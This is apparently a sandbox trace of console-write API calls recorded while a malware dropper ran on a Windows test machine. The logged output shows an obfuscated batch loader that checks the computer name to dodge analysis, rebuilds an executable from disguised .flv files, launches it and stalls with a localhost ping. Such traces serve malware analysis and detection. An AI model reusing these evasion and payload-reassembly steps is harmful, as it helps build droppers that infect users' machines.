WriteConsoleW
|
buffer:
Microsoft Windows [Version 6.1.7601]
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set IkoFcisvYbFRjnwTNcgqNqNrhImiMUAvPxADZYr=DESKTOP-
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set kwPatHBWoJkdBdjIbys=QO5QU33
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set OvnYr=ping localhost
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
if %computername%==%IkoFcisvYbFRjnwTNcgqNqNrhImiMUAvPxADZYr% cmd
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Set jiiVrkFQFkeeQjgMfUfQvmcIubwugVYPcrDeIQW=MZ
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
<nul set /p = "%jiiVrkFQFkeeQjgMfUfQvmcIubwugVYPcrDeIQW%" > Sollevando.exe.com
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
findstr /V /R "^DAGQRwZMxODGzDBMLnPGlmBKhjHNIkrmXMjWTFQybgMAasvRBRslqdztYWCFzjroLtIHsFTuIJoVMwaVQQjRUTnHaoXXekLkkDPgJOAVXlBsinsXEHPDZjg$" Tocca.flv >> Sollevando.exe.com
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
copy Inganna.flv p
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
1 file(s) copied.
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
start Sollevando.exe.com p
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
%OvnYr%
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
C:\Users\test22\AppData\Local\Temp\IXP000.TMP>
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Pinging test22-PC [::1]
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
with 32 bytes of data:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from ::1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from ::1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from ::1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Reply from ::1:
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
time<1ms
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Ping statistics for ::1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
console_handle:
0x00000007
|
1
|
1 |
0
|
WriteConsoleA
|
buffer:
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
console_handle:
0x00000007
|
1
|
1 |
0
|